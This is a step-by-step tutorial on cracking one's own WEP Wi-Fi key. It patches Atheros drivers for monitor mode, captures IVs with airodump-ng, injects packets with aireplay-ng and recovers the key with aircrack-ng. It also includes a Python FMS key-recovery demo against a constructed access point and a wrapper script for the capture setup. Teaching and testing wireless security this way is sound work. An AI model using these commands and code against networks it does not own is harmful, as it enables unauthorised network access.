Step by step (n00b friendly) instructions to crack your own WEP encryption key using Linux and an Atheros-based wifi card.


Note: Don't use this information to crack someone else's Wifi access point, because chances are it's illegal where you reside. I take no responsibility for what you do with this information. You have been warned.


WEP encryption is very weak. If your Wifi card supports "monitor mode", it can capture the frames that any nearby router transmits. Every WEP frame carries its 24-bit initialisation vector (IV) in the clear, and the key-recovery attacks implemented in aircrack-ng work on the statistics of those IVs, so once you have captured enough encrypted frames the software can deduce the WEP key from them.

The problem is that if there isn't much data being transferred on your network, it may take a very long time to capture enough frames to extract the WEP key. Sometimes 30,000 packets are enough, other times you might need up to 2,000,000. The solution is to "inject" packets into the network so that the router answers with more traffic (every answer is encrypted with a fresh IV); that speeds up the process a lot.
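To make the previous two paragraphs concrete, here is an added example, written for this page and not taken from aircrack-ng, of the classic FMS attack recovering a 40-bit WEP key from captured frames. It assumes a constructed access point with the made-up key 0badc0ffee and a fixed ARP-sized payload, and it stands in for the capture file with a function that returns the frame the AP would have sent for a given IV. Two facts do the work: the 3-byte IV is prepended to the secret to form the RC4 key, and the first plaintext byte of every WEP data frame is the LLC header byte 0xAA, so the first keystream byte of every frame is known. Only "weak" IVs (the resolved condition in the code) leak anything about a key byte, and a real network emits them at random, which is why tens or hundreds of thousands of frames have to be captured and why aircrack-ng keeps retrying as more arrive.

```python
"""Toy FMS attack on WEP: recover a 40-bit key from the first ciphertext
byte of frames sent with 'weak' IVs.  Constructed demo, not aircrack-ng code."""

SNAP_DSAP = 0xAA  # first plaintext byte of every WEP data frame (LLC header)


def ksa_prefix(key, steps):
    """Run the first `steps` rounds of the RC4 key schedule for `key`.
    Returns (S, j); with steps == 256 this is the full KSA."""
    S = list(range(256))
    j = 0
    n = len(key)
    for i in range(steps):
        j = (j + S[i] + key[i % n]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4(key, data):
    """Plain RC4: full KSA, then the PRGA keystream XORed over `data`."""
    S, _ = ksa_prefix(key, 256)
    i = j = 0
    out = bytearray()
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret, iv, payload):
    """WEP body: the 3-byte IV in the clear, then RC4(IV || secret, payload).
    Key-index byte and ICV are left out; they do not matter for the attack."""
    return iv + rc4(iv + secret, payload)


def fms_recover(key_len, frame_for_iv):
    """Recover `key_len` secret bytes, one at a time.  `frame_for_iv(iv)`
    returns the sniffed WEP body that used that IV, or None if none was seen."""
    recovered = bytearray()
    for b in range(key_len):
        B = 3 + b                      # index of the unknown byte in IV || key
        votes = [0] * 256
        for y in range(256):
            for x in range(256):
                iv = bytes((B, y, x))
                # Simulate the KSA as far as the bytes we already know allow.
                S, j = ksa_prefix(iv + recovered, B)
                s1 = S[1]
                # "Resolved" condition: with probability ~5% (vs 1/256 noise)
                # the first keystream byte is the value swapped into S[B].
                if not (s1 < B and (s1 + S[s1]) & 0xFF == B):
                    continue
                frame = frame_for_iv(iv)
                if frame is None:      # a passive capture only has some IVs
                    continue
                ks0 = frame[3] ^ SNAP_DSAP          # known plaintext leaks it
                votes[(S.index(ks0) - j - S[B]) & 0xFF] += 1
        recovered.append(max(range(256), key=votes.__getitem__))
    return bytes(recovered)


# --- constructed demo: a fake AP with a fixed 40-bit key -------------------
SECRET = bytes.fromhex("0badc0ffee")                    # constructed, not real
# LLC/SNAP header (AA AA 03, OUI 00 00 00, type 08 06 = ARP) + 28-byte ARP body
ARP_PAYLOAD = bytes.fromhex("aaaa030000000806") + bytes(28)


def sniffed_frame(iv):
    """Stand-in for the .ivs capture: the body the AP would send for this IV."""
    return wep_encrypt(SECRET, iv, ARP_PAYLOAD)


if __name__ == "__main__":
    key = fms_recover(len(SECRET), sniffed_frame)
    print("recovered:", key.hex(), "correct:", key == SECRET)
```

The vote mechanism, not the speed, is the point: the loop checks all 65,536 IVs with first byte B for each key byte, far more weak IVs than a passive capture would ever see, so the recovered bytes win their votes comfortably. If you modify the cipher core, the standard RC4 test vector (key "Key", plaintext "Plaintext", ciphertext bbf316e8d940af0ad3) is the quickest sanity check.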

Several Wifi cards support monitor mode and packet injection but don't have them enabled by default. To enable them, you must download a driver patch distributed by aircrack-ng. I will explain here how I did it with my Atheros card.

Instructions to install aircrack-ng on Prism2, PrismGT (FullMAC), Broadcom (with the b43 driver), RTL8180, RTL8187, Ralink, ACX1xx and Zydas:

Note: I might not always have the proper terminology. I am not a hacker and I don't claim to be one. I'm just a guy with too much time on my hands. Don't quote this document in your master's thesis on network security.

Step by step instructions:

Step 1: Install Linux on your computer. I installed Ubuntu because it's pretty.

Step 2: Create a folder in your home directory and download the madwifi-ng driver source.

cd /home/MYHOMEDIR
mkdir playground
cd playground
svn checkout madwifi-ng

Step 3: Download the aircrack-ng driver patch and patch the madwifi driver source. The patch is made against one specific madwifi-ng Subversion revision (the r3745 in its file name), so check out that revision rather than the latest trunk, or the patch will not apply cleanly.

cd madwifi-ng
patch -Np1 -i ../madwifi-ng-r3745.patch

Step 4: Compile the patched madwifi drivers. Compiling does not need root (only the install step later does), so there is no reason to run make with sudo.

make

Step 5: Unload the wifi drivers from memory.

sudo ./scripts/madwifi-unload

Step 6: Delete the former drivers from the kernel modules folder

I had to do this to install the patched drivers. Don't worry, the patched madwifi drivers also let you connect to the Internet normally.

NOTE: Chances are that your drivers are not in the same directory as mine. If you're using Ubuntu, they will be in /lib/modules/XXXXX/net/, where XXXXX is the version of the kernel you are running: uname -r prints it, and ls /lib/modules shows the folders for all installed kernels.

sudo rm /lib/modules/2.6.24-19-generic/net/ath*

Step 7: Install the patched drivers.

sudo make install

Step 8: Reboot your computer

Step 9: Install aircrack-ng

Using Ubuntu, from repository:

sudo apt-get install aircrack-ng

Instructions to install from source:

Step 10: Test the drivers and see if the card can get into monitor mode. Activate monitor mode.

If the test is successful, go to the next step.
If the test is unsuccessful, give up (or don't).

Do this (replace ath0 with your interface name, and PATHWHEREICOMPILEDMADWIFI with the path where you compiled madwifi; it's most likely /home/MYHOMEDIR/playground/madwifi-ng/ if you followed the instructions). sudo -s opens a root shell, so everything after it runs as root:

sudo -s
modprobe ath_pci
modprobe ath_hal
wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor

The above should give no errors. Then check whether your card is in monitor mode by looking at the interface with iwconfig ath0.

It should return something like this. The most important part is that it says Mode:Monitor:

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Channel:0 Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:16 dBm Sensitivity=1/1
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/70 Signal level=-94 dBm Noise level=-94 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Step 11: Note the information you need to crack your wifi access point.

The information you will need is:
-The router’s BSSID (router MAC)
-The channel on which the router broadcasts.

There are a few ways to get this. The easiest and coolest way is to use Kismet because it’s got a very cool looking interface, and it provides detailed information about neighbouring wifi networks. You will impress girls if you decide to use Kismet. However, Kismet doesn’t work on my computer anymore so I’m not going to talk about it.

I know that my wifi access point broadcasts on channel 6, so I launched airodump-ng and started recording all packets sent on channel 6. Let airodump-ng run in a separate terminal, because you will need to record as many packets as possible to crack the WEP key. Here is the command (replace FILENAME with whatever you want, and CHANNEL with the channel the access point broadcasts on):

sudo airodump-ng --ivs -w FILENAME -c CHANNEL ath0

The airodump-ng window gives out very useful information: the router's BSSID, the network name (ESSID), whether the network is using WEP (THIS WILL NOT WORK IF THE NETWORK USES WPA: the IV attacks are specific to WEP), and if you monitor for a little while it will list the MAC addresses of the stations (clients) associated with the router. The --ivs option saves only the IVs rather than whole frames, which is all aircrack-ng needs for this attack and keeps the capture files small.

Note all that information down.

Step 12: Inject packets
In airodump-ng: if the access point's #Data value (the number of captured data frames, i.e. IVs) increases really fast (so fast that it could get to 1,000,000 quickly), skip to the next step. If it's not moving much, you will need to stimulate the router using packet injection. There are many ways to do this; here is the way I do it:

In a separate terminal window, launch aireplay-ng:

sudo aireplay-ng -b BSSID -x 100 -2 INTERFACE

-BSSID is the router's MAC address in this format: 00:00:00:00:00:00
-INTERFACE is your wifi card's interface name. Since I have an Atheros card, mine is ath0. If you don't know what it is, you should have already given up.
-x 100 means that you don't want to send more than 100 packets per second. (You can change this. If you set it too high, your computer can crash. I think 100 is good enough; it won't necessarily go faster with 200 packets per second.)
-2 selects interactive packet replay: aireplay-ng shows you captured frames one at a time and replays the one you accept.

Then aireplay-ng will look for frames it can use. It will say "read xxxx packets" and eventually show you a frame and ask "Use this packet?"; hit "y" to use it and "n" to see another one. What you want is a frame the access point will relay onto the network again (a short broadcast frame such as an ARP request is ideal), because every relayed copy is encrypted with a fresh IV. You will have to learn by trial and error: if the frame you chose makes the #Data value in airodump-ng climb fast, keep it; if #Data doesn't change or increases slowly, hit CTRL-C and you will be shown another frame.

Once it starts increasing really fast, go to the next step.

From my experience, packets that look like this don’t work:

.(2 …..w..`…

And ones that have less data like this work better:

< ………..zh.)o
-… U._w.~C.
.Q.” ‘. [.me.”.
….x/i …. I.`…
.*#)., :.$u. .=

Note: It's quite possible that airodump-ng or aireplay-ng crashes; if one does, kill the process and launch it again. The data collected by airodump-ng stays in the folder and is not overwritten (each run gets a new numbered suffix: FILENAME-01.ivs, FILENAME-02.ivs and so on), which is why the crack command below takes *.ivs.

Step 13: Get your WEP key!
While airodump-ng collects packets and aireplay-ng injects them, launch aircrack-ng. It will automatically try to crack the WEP key; if it fails for lack of IVs, it waits for more data and tries again. Replace BSSID with the access point's BSSID. -a 1 forces WEP mode and -n 128 tells it the key is 128-bit (a 104-bit secret); for a 64-bit key use -n 64.

aircrack-ng -a 1 -n 128 -b BSSID *.ivs

Drink beer until it finds the WEP key.
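The capture side of Steps 10 to 13 can be set up by a small wrapper. This is an added helper script written for this page, not part of aircrack-ng or madwifi; it assumes the madwifi base device is wifi0 as in Step 10, validates the BSSID and channel you type, checks that the card really ended up in Mode:Monitor by reading iwconfig, and then runs airodump-ng in the foreground (so you can watch #Data) while printing the aireplay-ng and aircrack-ng commands for the other two terminals. The --bssid option restricts airodump-ng to your own access point.

```sh
#!/bin/sh
# wep-lab.sh: set up the capture side of the procedure above and print the
# commands for the other two terminals.  Added helper for this write-up; it is
# not part of aircrack-ng or madwifi.  Assumes the madwifi base device is wifi0.
# Usage: sudo ./wep-lab.sh BSSID CHANNEL [IFACE]
#   e.g. sudo ./wep-lab.sh 00:11:22:33:44:55 6 ath0

valid_bssid() {
    # six hex pairs separated by colons, the format airodump-ng prints
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

valid_channel() {
    # 2.4 GHz channels 1-14 (the 802.11b/g cards this write-up is about)
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 14 ]
}

in_monitor_mode() {
    # $1 is the output of iwconfig for the interface (Step 10 above)
    printf '%s\n' "$1" | grep -q 'Mode:Monitor'
}

need_tool() {
    command -v "$1" >/dev/null 2>&1 || { echo "missing tool: $1" >&2; return 1; }
}

main() {
    bssid=$1; channel=$2; iface=${3:-ath0}
    valid_bssid "$bssid"     || { echo "bad BSSID: $bssid (want 00:11:22:33:44:55)" >&2; exit 2; }
    valid_channel "$channel" || { echo "bad channel: $channel (want 1-14)" >&2; exit 2; }
    [ "$(id -u)" -eq 0 ]     || { echo "run as root: monitor mode and injection need it" >&2; exit 2; }
    for t in wlanconfig iwconfig airodump-ng; do need_tool "$t" || exit 2; done

    # Step 10: recreate the VAP in monitor mode and verify that it really is.
    wlanconfig "$iface" destroy 2>/dev/null || true
    wlanconfig "$iface" create wlandev wifi0 wlanmode monitor >/dev/null
    in_monitor_mode "$(iwconfig "$iface")" || {
        echo "$iface is not in Mode:Monitor; the madwifi patch is probably not loaded" >&2; exit 1; }

    # Steps 11-13: one capture prefix per run so earlier .ivs files are kept.
    prefix="weplab-$(date +%Y%m%d-%H%M%S)"
    cat <<EOF
Capturing IVs for $bssid on channel $channel to ${prefix}-*.ivs
In two other terminals run:
  sudo aireplay-ng -b $bssid -x 100 -2 $iface
  sudo aircrack-ng -a 1 -n 128 -b $bssid ${prefix}-*.ivs
EOF
    exec airodump-ng --ivs -w "$prefix" -c "$channel" --bssid "$bssid" "$iface"
}

# Only run when invoked with arguments, so the functions can also be sourced.
if [ "$#" -ge 2 ]; then
    main "$@"
fi
```

Because airodump-ng replaces the script via exec, CTRL-C in that terminal stops the capture and nothing else is left running; the aireplay-ng and aircrack-ng processes in the other terminals are yours to stop.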

Here's a screenshot of airodump-ng, aireplay-ng and aircrack-ng in action. Good luck!

aircrack-ng screenshot

aircrack-ng screenshot
